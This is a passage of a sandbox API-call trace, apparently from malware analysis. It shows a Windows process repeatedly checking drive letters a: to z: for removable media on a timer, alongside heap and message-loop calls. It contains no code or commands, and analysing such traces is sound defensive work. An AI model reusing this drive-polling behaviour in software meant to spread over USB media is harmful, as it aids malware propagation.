lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0210.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0210.057] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0210.057] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.057] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.057] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0210.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.057] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.058] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.058] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.058] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.102] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.102] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.103] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.103] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.103] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.103] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.103] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.103] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.104] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.104] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.104] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.104] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.105] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.105] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.105] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.105] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.105] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.105] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.106] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.106] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.106] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.106] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.107] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.107] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.107] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0210.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.107] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0210.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.107] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0210.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.108] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0210.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0210.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.108] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0210.108] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0210.108] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0210.108] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.109] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0210.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0210.109] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.109] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.109] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.109] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0210.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.110] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.110] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.110] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.110] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.110] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.110] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.110] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.111] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.111] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.111] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.111] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.111] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.112] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.112] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.112] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.112] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.112] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.232] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.232] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.232] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.232] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.233] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.233] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.233] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.233] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.233] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.233] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0210.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0210.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0210.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0210.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0210.234] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0210.234] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.234] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0210.234] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0210.234] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0210.234] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0210.235] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0210.235] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0210.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0210.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.235] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.235] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0210.235] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0210.235] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0210.235] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0210.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0210.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0210.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.236] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0210.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0210.236] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0210.236] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0210.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0210.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0210.236] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0210.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.237] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0210.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0210.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0210.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0210.237] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0210.237] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0210.237] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0210.237] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0210.237] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0210.237] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0210.238] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0210.238] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0210.238] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0210.238] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0210.239] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0210.239] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0210.239] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0210.239] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0210.239] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0210.240] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0210.240] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0210.240] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0210.240] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0210.240] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0210.241] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0210.241] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0210.241] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0210.241] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0210.241] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0210.242] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0210.242] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0210.242] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0210.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0210.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0210.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0210.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0210.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0210.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0210.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0210.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0210.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0210.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0210.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0210.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0210.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0210.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0210.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0210.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0210.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0210.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 